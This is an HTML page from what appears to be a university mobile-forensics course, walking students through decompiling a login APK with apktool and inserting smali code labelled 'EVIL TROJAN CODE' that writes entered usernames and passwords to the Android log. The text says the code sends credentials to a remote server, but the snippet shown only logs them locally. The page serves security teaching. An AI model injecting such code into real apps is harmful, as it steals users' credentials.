-
Notifications
You must be signed in to change notification settings - Fork 0
/
mobile_forensics_activity2.html
203 lines (195 loc) · 10.9 KB
/
mobile_forensics_activity2.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
<!DOCTYPE html>
<html class="no-js" lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta http-equiv="x-ua-compatible" content="ie=edge">
<title>Activity 2 - Mobile Forensics</title>
<meta name="description" content="">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="canonical" href="http://html5-templates.com/">
<link rel="apple-touch-icon" href="apple-touch-icon.png">
<!-- Place favicon.ico in the root directory -->
<link rel="stylesheet" href="style.css">
<script src="js/vendor/modernizr-2.8.3.min.js"></script>
<style type="text/css">
.auto-style1 {
color: #0645AD;
}
</style>
</head>
<body>
<!--[if lt IE 8]>
<p class="browserupgrade">You are using an <strong>outdated</strong> browser. Please <a href="https://browsehappy.com/">upgrade your browser</a> to improve your experience.</p> <![endif]-->
<div class="wrapAll clearfix">
<div class="sidebar" style="left: -21px; top: 32px; width: 10.6em; height: 618px">
<div class="logo"> <a href="index.html"><img src="img/ttu/TTUCS-logo.PNG" alt="logo"></a>
</div>
<div class="navigation">
<ul>
<li><a href="index.html">Main page</a></li>
<!--<li><a href="#">Contents</a></li>
<li><a href="#">Featured content</a></li>-->
</ul>
<br>
<h3>Topics</h3>
<ul>
<li style="width: 155px"><a href="mobile_forensics.html"> Mobile Forensics</a></li>
<li class="auto-style1" style="text-align: center;"><a href="mobile_forensics_activity1.html" style="color: #a72614;">Activity 1</a></li>
<li class="auto-style1" style="text-align: center;"><a href="mobile_forensics_activity2.html" style="color: #a72614;">Activity 2</a></li>
<li class="auto-style1" style="text-align: center;"><a href="mobile_forensics_activity3.html" style="color: #a72614;">Activity 3</a></li>
<li class="auto-style1" style="text-align: center;"><a href="mobile_forensics_activity4.html" style="color: #a72614;">Activity 4</a></li>
<li class="auto-style1" style="text-align: center;"><a href="mobile_forensics_activity5.html" style="color: #a72614;">Activity 5</a></li>
<li style="width: 155px"><a href="#">Malware Analysis</a></li>
<li class="auto-style1"><a href="#">Software Security</a></li>
<li class="auto-style1"><a href="#">Network Forensics</a></li>
<li class="auto-style1"><a href="#">Social Engineering</a></li>
<li class="auto-style1"><a href="#">Reverse Engineering</a></li>
<li class="auto-style1"><a href="#">Content/Threat Analysis</a></li>
</ul>
<!--
<h3>References</h3>
<ul>
<li class="auto-style1"><a href="mobile_forensics_references.html">Mobile Forensics</a></li>
<li class="auto-style1"><a href="#">Malware Analysis</a></li>
</ul>
-->
<br>
<h3>Interaction </h3>
<ul>
<li><a href="contact_us.html">Contact Us</a></li>
<li><a href="about.html">About</a></li>
</ul>
</div>
</div>
<div class="mainsection">
<div class="headerLinks"> <a href="#">Contributions</a>
</div>
<div class="tabs clearfix">
<div class="tabsLeft">
<ul>
<li><a href="#" class="active">Article</a></li>
</ul>
</div>
<div id="simpleSearch"> <input name="searchInput" id="searchInput" placeholder="Search Wikipedia"
size="12"
type="text">
<div id="submitSearch"></div>
</div>
<div class="tabsRight">
<ul>
<li><a href="#" class="active">Read</a></li>
<li><a href="#">View source</a></li>
<li><a href="#">View history</a></li>
</ul>
</div>
</div>
<div class="article">
<h1>Activity 2 - Mobile Forensics</h1>
<p class="siteSub"> </p>
<h3>Re-building the APK File</h3>
<p class="roleNote">Estimated Time : 30 Minutes</p>
<h2>Objective</h2>
<p>In this Activity 2, <a href="https://en.wikipedia.org/wiki/Apk_(file_format)">APK</a> file is extracted to a folder and malicious code is injected into one of the files.</p>
<h2>Description</h2>
<p>
After generating a signed APK file in Activity 1,
we will extract it into a folder structure and inject
a malicious code into one of the files. This code will
take a copy of login credentials entered on the app and
sends to a remote server unnoticed.
</p>
<h2>Artifacts</h2>
<p> Click below link to download files.<br>
<a href="img/ttu/Activity2/login.apk" alt="app-release.apk">login.apk</a></p>
<a href="img/ttu/Activity2/p9cert.jks" alt="app-release.apk">p9cert.jks</a></p>
<h2>Instructions</h2>
<p>
<ul>
<li>Step 1: Download the file "apktool_2.0.0rc3.jar" from below given link. With help of this jar file, we will extract the "app-release.apk" file created in Activity 1 and see the files content.</li>
   <a href="https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.0.0rc3.jar">https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.0.0rc3.jar</a>
<br>
<br>
<li>Step 2: Now place the downloaded file in the same directory where "app-release.apk" exists.</li>
   <img src="img/ttu/Activity2/reference-folder-structure.PNG" width="50%" height="50%">
<br><br>
<li>Step 3: Open command prompt and go to folder location where files "apktool_2.0.0rc3.jar" & "app-release.apk" are present.</li>
<br>
<li>Step 4: Run below command to extract the apk file into a folder structure.</li>
   java -jar apktool_2.0.0rc3.jar d app-release.apk<br>
   <img src="img/ttu/Activity2/APK-Extraction.PNG" width="50%" height="50%">
<br><br>
<li>Step 5: Go inside app-release folder and observe the sub-folders</li>
<br>
<li>Step 6: There are several files with extension as ".smali" inside sub-folder called "smali" under app-release</li>
   <img src="img/ttu/Activity2/app-release-folder.PNG" width="50%" height="50%">
<br><br>
<li>Step 7: Search for file "RestClient.smali" and open it in any text editor (Example: Notepad++). Now find the method "performLogin" in the code.</li>
<br>
<li>Step 8: Add below piece of code after ".line 258" in the file.</li>
<br>
<p style="color:blue;">
   # EVIL TROJAN CODE LOGGING PASSWORD<br>
   const-string v0, "TTUPROJECT"<br>
   const-string v1, "USERNAME AND PASSWORD BELOW"<br>
   invoke-static {v0, v1}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I<br>
   invoke-static {v0, p3}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I<br>
   invoke-static {v0, p4}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I<br>
   # END OF EVIL TROJAN CODE<br>
</p>
<br>
   <img src="img/ttu/Activity2/existing-code.PNG" width="50%" height="50%"><br><br>
   <img src="img/ttu/Activity2/modified-code.PNG" width="50%" height="50%">
<br><br>
<li>Step 9: Save the code changes in "RestClient.smali" file</li>
</ul>
</p>
<h2>Self-Assessment</h2>
<p>Please complete the following self-assessment over Activity 2.<br>
<a href="Challenge2.html" alt="Start Assessment">Start Assessment</a>
</p>
<!--<div class="lavenderBox">
<div class="header">Panel title</div>
<div class="subtitle linklist"><a href="#">Lorem</a> <a href="#">Ipsum</a>
<a href="#">Dolorestitas</a> </div>
<div class="linklist"> <a href="#">Percipit </a> <a href="#">Mnesarchum
</a> <a href="#">Molestie </a> <a href="#">Phaedrum </a> <a
href="#">Luptatum
constituam </a> <a href="#">Habeo adipisci </a> <a href="#">Inani
zril </a> <a href="#">Forensibus sea </a> <a href="#">Habeo
adipisci </a> <a href="#">Minimum corrumpit </a> <a href="#">Regione
suscipit </a> <a href="#">Has et partem </a><a href="#">Percipit
</a> <a href="#">Mnesarchum </a> <a href="#">Molestie </a> <a
href="#">Phaedrum
</a> <a href="#">Luptatum constituam </a> <a href="#">Habeo
adipisci </a> <a href="#">Inani zril </a> <a href="#">Vel
nisl albucius </a> <a href="#">Habeo adipisci </a> <a href="#">Minimum
corrumpit </a> <a href="#">Regione suscipit </a> <a href="#">Percipit
maiestatis </a> <a href="#">Regione suscipit </a> <a href="#">Percipit
maiestatis </a> </div>
<div class="subtitle">Subtitle</div>
</div>
<div class="categories"> <a href="https://info.flagcounter.com/WApn"><img
src="https://s11.flagcounter.com/count2/WApn/bg_FFFFFF/txt_000000/border_CCCCCC/columns_2/maxflags_10/viewers_0/labels_0/pageviews_0/flags_0/percent_0/"
alt="Flag Counter"
border="0"></a>
</div>
-->
</div>
<div class="pagefooter"> This page was last edited on 29.07.2017 |
Template by <a href="http://html5-templates.com/" target="_blank" rel="nofollow">HTML5
Templates</a>
<!-- Please leave this link unchanged -->
<div class="footerlinks"> <a href="#">Privacy policy</a> <a href="#">About</a>
<a href="#">Terms and conditions</a> <a href="#">Cookie statement</a>
<a href="#">Developers</a> </div>
</div>
</div>
</div>
<script src="https://code.jquery.com/jquery-1.12.0.min.js"></script>
<script>window.jQuery || document.write('<script src="js/vendor/jquery-1.12.0.min.js"><\/script>')</script>
<script src="script.js"></script>
<link rel="stylesheet" href="AIchat.v1.css" type="text/css" media="screen" />
<script type="text/javascript" src="dependencies.v1.js"></script>
<script type="text/javascript" src="AIchat.v1.js"></script>
</body>
</html>